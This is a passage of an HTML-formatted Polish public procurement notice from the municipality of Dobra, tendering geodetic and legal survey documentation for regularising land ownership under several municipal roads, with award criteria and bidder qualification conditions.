Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane metodą punktową w skali 100-punktowej. Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny. Cena będzie oceniana metodą punktową wg wzoru: (Cena najniższa ze wszystkich ofert x 100pkt x Znaczenie kryterium 60%)/ Cena oferty badanej.<br/>DOŚWIADCZENIE OSÓB WYZNACZONYCH DO REALIZACJI ZAMÓWIENIA – 40%. Zamawiający, oceniając doświadczenie osób wyznaczonych do realizacji zamówienia, weźmie pod uwagę doświadczenie geodety uzyskane poprzez jego udział w realizacji prac geodezyjnych opisanych poniżej: Geodeta uprawniony – doświadczenie w wykonywaniu prac geodezyjnych zrealizowanymi w okresie ostatnich 3 lat przed upływem terminu składania ofert polegającymi na sporządzeniu dokumentacji geodezyjno-prawnej do regulacji stanu prawnego drogi publicznej w rozumieniu ustawy o drogach publicznych w trybie art. 73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną - jako geodeta uprawniony. Za zadeklarowanie doświadczenia geodety uprawnionego, w realizacji 1 prac, spełniającej warunki, o których mowa powyżej 10 pkt. Za zadeklarowanie doświadczenia geodety uprawnionego, w realizacji 2 prac, spełniającej warunki, o których mowa powyżej 20 pkt. Za zadeklarowanie doświadczenia geodety uprawnionego, w realizacji 3 prac, spełniającej warunki, o których mowa powyżej 30 pkt. Za zadeklarowanie doświadczenia geodety uprawnionego, w realizacji 4 prac, spełniającej warunki, o których mowa powyżej 40 pkt. Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium doświadczenie osób wyznaczonych do realizacji zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 3 - Wykonanie dokumentacji dla dróg „Sabury” w miejscowości Gruszowiec, gmina Dobra i „Miśkowce” w miejscowości Gruszowiec, gmina Dobra<br/>Składające się następujących zadań.<br/><br/>1.	Wykonanie dokumentacji geodezyjno-prawnej w celu regulacji stanu prawnego nieruchomości zajętych pod drogę gminną „Sabury” w miejscowości Gruszowiec, gmina Dobra w oparciu o przepisy art.73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.),a w razie zaistnienia takiej potrzeby w oparciu o przepisy ustawy z dnia 10 maja 1990 r. Przepisy wprowadzające ustawę o samorządzie terytorialnym i ustawę o pracownikach samorządowych (Dz. U. 1990 r. nr 32 poz.191 z późn. zm.).<br/> Na w/w dokumentację składać się będzie:<br/>a)	Pomiar pasa drogowego: ustalenie/wyznaczenie granic na podstawie przepisów Rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 27 lipca 2021 r. <br/>w sprawie ewidencji gruntów i budynków działki ewid. nr 1163, 1141 (w całości). Zakres praz geodezyjnych przedstawiony jest na załączniku nr 7. W przypadku zajęcia części nieruchomości sąsiadujących z drogą, pod drogę publiczną na dzień 31 grudnia 1998 r. należy sporządzić projekty podziału nieruchomości na podstawie przepisów art. 73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.). W szczególności wydzielenie części działek nr 1020, 1021 i 1022, 1174, 1175 zajętych pod drogę.<br/>b)	Wykonanie mapy do celów prawnych wraz z wykazem synchronizacyjnym dla działek ewidencyjnych nr 1163, 1141 (w całości), położonych w miejscowości Gruszowiec. W razie potrzeby wykonanie aktualizacji operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek oraz sporządzenie mapy do celów prawnych o nazwie: „Aktualizacja operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek ewidencyjnych”. Wykazy synchronizacyjne powinny być sporządzone tak, aby po wydaniu decyzji „komunalizacyjnej” służyły do założenia księgi wieczystej na działki na jakie decyzja została wydana.<br/>c)	Wykonanie mapy do celów prawnych – dla potrzeb postępowań administracyjnych przedstawiającą przebieg pasa drogowego wg. stanu na dzień 31 grudnia 1998 r.<br/>d)	Dokumentacja stanowiąca przedmiot umowy będzie sporządzona przez Wykonawcę <br/>i przekazana Zamawiającemu w ilości:<br/> - mapy do celów prawnych-aktualizacja operatu EGiB wraz wykazami synchronizacyjnymi –w ilości egz. równej ilości wydzielonych ciał hipotecznych+3 dodatkowe egz.<br/> - mapa zbiorcza z projektem podziału nieruchomości dla wszystkich dzielonych nieruchomości zajętych pod pas drogowy na dzień 31 grudnia 1998 r. – w ilości dzielonych działek +3 dodatkowe egz.<br/> - mapy do celów prawnych – dla potrzeb postępowań administracyjnych przedstawiającą przebieg pasa drogowego wg. stanu na dzień 31 grudnia 1998 r. <br/> - 4 egz.<br/> - operat pomiarowy w postaci elektronicznej.<br/><br/>e)	Dokumentacja geodezyjna (mapy do celów prawnych, mapy z projektem podziału nieruchomości) służąca do regulacji stanu prawnego dróg na podst. art. 73 ustawy <br/>z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną, musi zawierać adnotację, iż „stan uwidoczniony na mapie odzwierciedla stan faktycznego zajęcia nieruchomości pod drogę publiczną na dzień 31 grudnia 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną.”<br/><br/>2.	Wykonanie dokumentacji geodezyjno-prawnej w celu regulacji stanu prawnego nieruchomości zajętych pod drogę gminną „Miśkowce” w miejscowości Gruszowiec, gmina Dobra w oparciu o przepisy art. 73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.), a w razie zaistnienia takiej potrzeby w oparciu o przepisy ustawy z dnia 10 maja 1990 r. Przepisy wprowadzające ustawę o samorządzie terytorialnym i ustawę <br/>o pracownikach samorządowych (Dz. U. 1990 r. nr 32 poz.191 z późn. zm.).<br/> Na w/w dokumentację składać się będzie:<br/>a)	Pomiar pasa drogowego: ustalenie/wyznaczenie granic na podstawie przepisów Rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 27 lipca 2021 r. <br/>w sprawie ewidencji gruntów i budynków działki ewid. nr 154 (w całości). Zakres prac geodezyjnych przedstawiony jest na załączniku nr 8. W przypadku zajęcia części nieruchomości sąsiadujących z drogą, pod drogę publiczną na dzień 31 grudnia 1998 r. należy sporządzić projekty podziału nieruchomości na podstawie przepisów art. 73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.).<br/><br/>b)	Wykonanie mapy do celów prawnych wraz z wykazem synchronizacyjnym dla działki ewidencyjnej nr 154 (w całości), położonej w miejscowości Gruszowiec. W razie potrzeby wykonanie aktualizacji operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek oraz sporządzenie mapy do celów prawnych o nazwie: „Aktualizacja operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek ewidencyjnych”. Wykazy synchronizacyjne powinny być sporządzone tak, aby po wydaniu decyzji „komunalizacyjnej” służyły do założenia księgi wieczystej na działki na jakie decyzja została wydana.<br/>c)	Wykonanie mapy do celów prawnych – dla potrzeb postępowań administracyjnych przedstawiającą przebieg pasa drogowego wg. stanu na dzień 31 grudnia 1998 r.<br/><br/>d)	Dokumentacja stanowiąca przedmiot umowy będzie sporządzona przez Wykonawcę <br/>i przekazana Zamawiającemu w ilości:<br/> -mapy do celów prawnych-aktualizacja operatu EGiB wraz wykazami synchronizacyjnymi–w ilości egz. równej ilości wydzielonych ciał hipotecznych+3 dodatkowe egz.<br/> -mapa zbiorcza z projektem podziału nieruchomości dla wszystkich dzielonych nieruchomości zajętych pod pas drogowy na dzień 31 grudnia 1998 r. – w ilości dzielonych działek +3 dodatkowe egz.<br/> - mapy do celów prawnych – dla potrzeb postępowań administracyjnych przedstawiającą przebieg pasa drogowego wg. stanu na dzień 31 grudnia 1998 r. <br/> – 4 egz.<br/> - operat pomiarowy w postaci elektronicznej.<br/><br/>e)	Dokumentacja geodezyjna (mapy do celów prawnych, mapy z projektem podziału nieruchomości) służąca do regulacji stanu prawnego dróg na podst. art. 73 ustawy <br/>z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną, musi zawierać adnotację, iż „stan uwidoczniony na mapie odzwierciedla stan faktycznego zajęcia nieruchomości pod drogę publiczną na dzień 31 grudnia 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną.” </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71300000-1 - Usługi inżynieryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71350000-6 - Usługi inżynieryjne naukowe i techniczne</p> <p class="mb-0">71354000-4 - Usługi sporządzania map</p> <p class="mb-0">71354300-7 - Usługi badań katastralnych</p> <p class="mb-0">71355000-1 - Usługi pomiarowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">240 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane metodą punktową w skali 100-punktowej. Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny. Cena będzie oceniana metodą punktową wg wzoru: (Cena najniższa ze wszystkich ofert x 100pkt x Znaczenie kryterium 60%)/ Cena oferty badanej.<br/>DOŚWIADCZENIE OSÓB WYZNACZONYCH DO REALIZACJI ZAMÓWIENIA – 40%. Zamawiający, oceniając doświadczenie osób wyznaczonych do realizacji zamówienia, weźmie pod uwagę doświadczenie geodety uzyskane poprzez jego udział w realizacji prac geodezyjnych opisanych poniżej: Geodeta uprawniony – doświadczenie w wykonywaniu prac geodezyjnych zrealizowanymi w okresie ostatnich 3 lat przed upływem terminu składania ofert polegającymi na sporządzeniu dokumentacji geodezyjno-prawnej do regulacji stanu prawnego drogi publicznej w rozumieniu ustawy o drogach publicznych w trybie art. 73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną - jako geodeta uprawniony. Za zadeklarowanie doświadczenia geodety uprawnionego, w realizacji 1 prac, spełniającej warunki, o których mowa powyżej 10 pkt. Za zadeklarowanie doświadczenia geodety uprawnionego, w realizacji 2 prac, spełniającej warunki, o których mowa powyżej 20 pkt. Za zadeklarowanie doświadczenia geodety uprawnionego, w realizacji 3 prac, spełniającej warunki, o których mowa powyżej 30 pkt. Za zadeklarowanie doświadczenia geodety uprawnionego, w realizacji 4 prac, spełniającej warunki, o których mowa powyżej 40 pkt. Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium doświadczenie osób wyznaczonych do realizacji zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część nr 4 - Składające się następujących zadań.<br/><br/>1.	Wykonanie dokumentacji geodezyjno-prawnej w celu regulacji stanu prawnego nieruchomości zajętych pod drogę gminną „Morgi pod Działy” w miejscowości Dobra, gmina Dobra w oparciu o przepisy art.73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.),a w razie zaistnienia takiej potrzeby w oparciu o przepisy ustawy z dnia 10 maja 1990 r. Przepisy wprowadzające ustawę o samorządzie terytorialnym i ustawę o pracownikach samorządowych (Dz. U. 1990 r. nr 32 poz.191 z późn. zm.).<br/> Na w/w dokumentację składać się będzie:<br/>a)	Pomiar pasa drogowego: ustalenie/wyznaczenie granic na podstawie przepisów Rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 27 lipca 2021 r. <br/>w sprawie ewidencji gruntów i budynków działki ewid. nr 1171, 657 (w całości), oraz działki 809/2 (w części). Zakres praz geodezyjnych przedstawiony jest na załączniku nr 9,10. W przypadku zajęcia części nieruchomości sąsiadujących z drogą, pod drogę publiczną na dzień 31 grudnia 1998 r. należy sporządzić projekty podziału nieruchomości na podstawie przepisów art. 73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.). <br/>b)	Wykonanie mapy do celów prawnych wraz z wykazem synchronizacyjnym dla działek ewid. nr 1171, 657 (w całości), oraz działki 809/2 (w części), położonych w miejscowości Dobra. W razie potrzeby wykonanie aktualizacji operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek oraz sporządzenie mapy do celów prawnych o nazwie: „Aktualizacja operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek ewidencyjnych”. Wykazy synchronizacyjne powinny być sporządzone tak, aby po wydaniu decyzji „komunalizacyjnej” służyły do założenia księgi wieczystej na działki na jakie decyzja została wydana.<br/><br/>c)	Wykonanie mapy do celów prawnych – dla potrzeb postępowań administracyjnych przedstawiającą przebieg pasa drogowego wg. stanu na dzień 31 grudnia 1998 r.<br/><br/>d)	Dokumentacja stanowiąca przedmiot umowy będzie sporządzona przez Wykonawcę <br/>i przekazana Zamawiającemu w ilości:<br/>-mapy do celów prawnych-aktualizacja operatu EGiB wraz wykazami synchronizacyjnymi –w ilości egz. równej ilości wydzielonych ciał hipotecznych+3 dodatkowe egz.<br/>-mapa zbiorcza z projektem podziału nieruchomości dla wszystkich dzielonych nieruchomości zajętych pod pas drogowy na dzień 31 grudnia 1998 r. – w ilości dzielonych działek +3 dodatkowe egz.<br/>- mapy do celów prawnych – dla potrzeb postępowań administracyjnych przedstawiającą przebieg pasa drogowego wg. stanu na dzień 31 grudnia 1998 r. <br/>– 4 egz.<br/>- operat pomiarowy w postaci elektronicznej.<br/><br/>e) Dokumentacja geodezyjna (mapy do celów prawnych, mapy z projektem podziału nieruchomości) służąca do regulacji stanu prawnego dróg na podst. art. 73 ustawy <br/>z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną, musi zawierać adnotację, iż „stan uwidoczniony na mapie odzwierciedla stan faktycznego zajęcia nieruchomości pod drogę publiczną na dzień 31 grudnia 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną.”<br/><br/>2.	Wykonanie dokumentacji geodezyjno-prawnej w celu regulacji stanu prawnego nieruchomości zajętych pod drogę gminną „Gruszów-Zające” w miejscowości Przenosza, gmina Dobra w oparciu o przepisy art. 73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.),a w razie zaistnienia takiej potrzeby w oparciu o przepisy ustawy z dnia 10 maja 1990 r. Przepisy wprowadzające ustawę o samorządzie terytorialnym i ustawę o pracownikach samorządowych (Dz. U. 1990 r. nr 32 poz.191 z późn. zm.).<br/> Na w/w dokumentację składać się będzie:<br/>a)	Pomiar pasa drogowego: ustalenie/wyznaczenie granic na podstawie przepisów Rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 27 lipca 2021 r. <br/>w sprawie ewidencji gruntów i budynków działki ewid. nr 370 (w całości). Zakres prac geodezyjnych przedstawiony jest na załączniku nr 11. W przypadku zajęcia części nieruchomości sąsiadujących z drogą, pod drogę publiczną na dzień 31 grudnia 1998 r. należy sporządzić projekty podziału nieruchomości na podstawie przepisów art. 73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.). <br/><br/>b)	Wykonanie mapy do celów prawnych wraz z wykazem synchronizacyjnym dla działki ewidencyjnej nr 370 (w całości), położonej w miejscowości Przenosza. W razie potrzeby wykonanie aktualizacji operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek oraz sporządzenie mapy do celów prawnych o nazwie: „Aktualizacja operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek ewidencyjnych”. Wykazy synchronizacyjne powinny być sporządzone tak, aby po wydaniu decyzji „komunalizacyjnej” służyły do założenia księgi wieczystej na działki na jakie decyzja została wydana.<br/>c)	Wykonanie mapy do celów prawnych – dla potrzeb postępowań administracyjnych przedstawiającą przebieg pasa drogowego wg. stanu na dzień 31 grudnia 1998 r.<br/><br/>d)	Dokumentacja stanowiąca przedmiot umowy będzie sporządzona przez Wykonawcę <br/>i przekazana Zamawiającemu w ilości:<br/> -mapa do celów prawnych-aktualizacja operatu EGiB wraz wykazami synchronizacyjnymi –w ilości egz. równej ilości wydzielonych ciał hipotecznych+3 dodatkowe egz.<br/> -mapa zbiorcza z projektem podziału nieruchomości dla wszystkich dzielonych nieruchomości zajętych pod pas drogowy na dzień 31 grudnia 1998 r. – w ilości dzielonych działek +3 dodatkowe egz.<br/> - mapa do celów prawnych – dla potrzeb postępowań administracyjnych przedstawiającą przebieg pasa drogowego wg. stanu na dzień 31 grudnia 1998 r. – 4 egz.<br/> - operat pomiarowy w postaci elektronicznej<br/><br/>e)	Dokumentacja geodezyjna (mapy do celów prawnych, mapy z projektem podziału nieruchomości) służąca do regulacji stanu prawnego dróg na podst. art. 73 ustawy <br/>z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną, musi zawierać adnotację, iż „stan uwidoczniony na mapie odzwierciedla stan faktycznego zajęcia nieruchomości pod drogę publiczną na dzień 31 grudnia 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną.”<br/><br/>3.	Wykonanie dokumentacji geodezyjno-prawnej w celu regulacji stanu prawnego nieruchomości zajętych pod drogę gminną „Jopły-Liszki” w miejscowości Porąbka, gmina Dobra w oparciu o przepisy art. 73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.),a w razie zaistnienia takiej potrzeby w oparciu o przepisy ustawy z dnia 10 maja 1990 r. Przepisy wprowadzające ustawę o samorządzie terytorialnym i ustawę <br/>o pracownikach samorządowych (Dz. U. 1990 r. nr 32 poz.191 z późn. zm.).<br/> Na w/w dokumentację składać się będzie:<br/>f)	Pomiar pasa drogowego: ustalenie/wyznaczenie granic na podstawie przepisów Rozporządzenie Ministra Rozwoju, Pracy i Technologii z dnia 27 lipca 2021 r. <br/>w sprawie ewidencji gruntów i budynków działki ewid. nr 597 (w całości). Zakres prac geodezyjnych przedstawiony jest na załączniku nr 12. W przypadku zajęcia części nieruchomości sąsiadujących z drogą, pod drogę publiczną na dzień 31 grudnia 1998 r. należy sporządzić projekty podziału nieruchomości na podstawie przepisów art. 73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną (Dz. U. nr 133, poz.872 z późn. zm.). W szczególności wydzielenie części działek nr 669 i 670.<br/><br/>g)	Wykonanie mapy do celów prawnych wraz z wykazem synchronizacyjnym dla działki ewidencyjnej nr 597 (w całości), położonej w miejscowości Porąbka. W razie potrzeby wykonanie aktualizacji operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek oraz sporządzenie mapy do celów prawnych o nazwie: „Aktualizacja operatu ewidencji gruntów i budynków z uwagi na stan prawny parcel katastralnych wchodzących w skład w/w działek ewidencyjnych”. Wykazy synchronizacyjne powinny być sporządzone tak, aby po wydaniu decyzji „komunalizacyjnej” służyły do założenia księgi wieczystej na działki na jakie decyzja została wydana.<br/>h)	Wykonanie mapy do celów prawnych – dla potrzeb postępowań administracyjnych przedstawiającą przebieg pasa drogowego wg. stanu na dzień 31 grudnia 1998 r.<br/><br/>i)	Dokumentacja stanowiąca przedmiot umowy będzie sporządzona przez Wykonawcę <br/>i przekazana Zamawiającemu w ilości:<br/> -mapa do celów prawnych-aktualizacja operatu EGiB wraz wykazami synchronizacyjnymi –w ilości egz. równej ilości wydzielonych ciał hipotecznych+3 dodatkowe egz.<br/> -mapa zbiorcza z projektem podziału nieruchomości dla wszystkich dzielonych nieruchomości zajętych pod pas drogowy na dzień 31 grudnia 1998 r. – w ilości dzielonych działek +3 dodatkowe egz.<br/> - mapa do celów prawnych – dla potrzeb postępowań administracyjnych przedstawiającą przebieg pasa drogowego wg. stanu na dzień 31 grudnia 1998 r. – 4 egz.<br/> - operat pomiarowy w postaci elektronicznej<br/><br/>j)	Dokumentacja geodezyjna (mapy do celów prawnych, mapy z projektem podziału nieruchomości) służąca do regulacji stanu prawnego dróg na podst. art. 73 ustawy <br/>z dnia 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną, musi zawierać adnotację, iż „stan uwidoczniony na mapie odzwierciedla stan faktycznego zajęcia nieruchomości pod drogę publiczną na dzień 31 grudnia 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną.”<br/><br/><br/>Ciąg dalszy opisu przedmiotu zamówienia w informacjach dodatkowych w ogłoszeniu. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71300000-1 - Usługi inżynieryjne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71350000-6 - Usługi inżynieryjne naukowe i techniczne</p> <p class="mb-0">71354000-4 - Usługi sporządzania map</p> <p class="mb-0">71354300-7 - Usługi badań katastralnych</p> <p class="mb-0">71355000-1 - Usługi pomiarowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">240 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferty będą oceniane metodą punktową w skali 100-punktowej. Oferta może otrzymać maksymalnie 60 pkt (1% = 1 pkt) w zakresie kryterium ceny. Cena będzie oceniana metodą punktową wg wzoru: (Cena najniższa ze wszystkich ofert x 100pkt x Znaczenie kryterium 60%)/ Cena oferty badanej.<br/>DOŚWIADCZENIE OSÓB WYZNACZONYCH DO REALIZACJI ZAMÓWIENIA – 40%. Zamawiający, oceniając doświadczenie osób wyznaczonych do realizacji zamówienia, weźmie pod uwagę doświadczenie geodety uzyskane poprzez jego udział w realizacji prac geodezyjnych opisanych poniżej: Geodeta uprawniony – doświadczenie w wykonywaniu prac geodezyjnych zrealizowanymi w okresie ostatnich 3 lat przed upływem terminu składania ofert polegającymi na sporządzeniu dokumentacji geodezyjno-prawnej do regulacji stanu prawnego drogi publicznej w rozumieniu ustawy o drogach publicznych w trybie art. 73 ustawy z 13 października 1998 r. Przepisy wprowadzające ustawy reformujące administrację publiczną - jako geodeta uprawniony. Za zadeklarowanie doświadczenia geodety uprawnionego, w realizacji 1 prac, spełniającej warunki, o których mowa powyżej 10 pkt. Za zadeklarowanie doświadczenia geodety uprawnionego, w realizacji 2 prac, spełniającej warunki, o których mowa powyżej 20 pkt. Za zadeklarowanie doświadczenia geodety uprawnionego, w realizacji 3 prac, spełniającej warunki, o których mowa powyżej 30 pkt. Za zadeklarowanie doświadczenia geodety uprawnionego, w realizacji 4 prac, spełniającej warunki, o których mowa powyżej 40 pkt. Oferta może otrzymać maksymalnie 40 pkt (1% = 1 pkt) w zakresie kryterium doświadczenie osób wyznaczonych do realizacji zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Na podstawie art. 112 ustawy Pzp, zamawiający określa warunek/warunki udziału w postępowaniu dotyczący/-e:<br/><br/>1) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia szczegółowego warunku w tym zakresie.<br/><br/>2) sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczegółowego warunku w tym zakresie.<br/><br/>3) zdolności technicznej lub zawodowej:<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/><br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie: zdolności zawodowej, jeżeli Wykonawca dysponuje osobami zdolnymi do realizacji zamówienia tj.: osobą posiadającą uprawnienia zawodowe w dziedzinie geodezji i kartografii w zakresie 2: rozgraniczenia i podziały nieruchomości (gruntów) oraz sporządzenie dokumentacji do celów prawnych.<br/><br/>W przypadku składania oferty na więcej niż 1 cześć:<br/>zamawiający dopuszcza, aby wykonawca w celu wykazania spełnienia warunków udziału w postępowaniu posłużył się tym samymi osobami zdolnymi do realizacji zamówienia dla wszystkich części, pod warunkiem że doświadczenie to spełnia warunki określone odrębnie dla każdej z tych części. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie Wykonawcy o niepodleganiu wykluczeniu</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu</span> </h3> <h3 class="mb-0">5.8.) 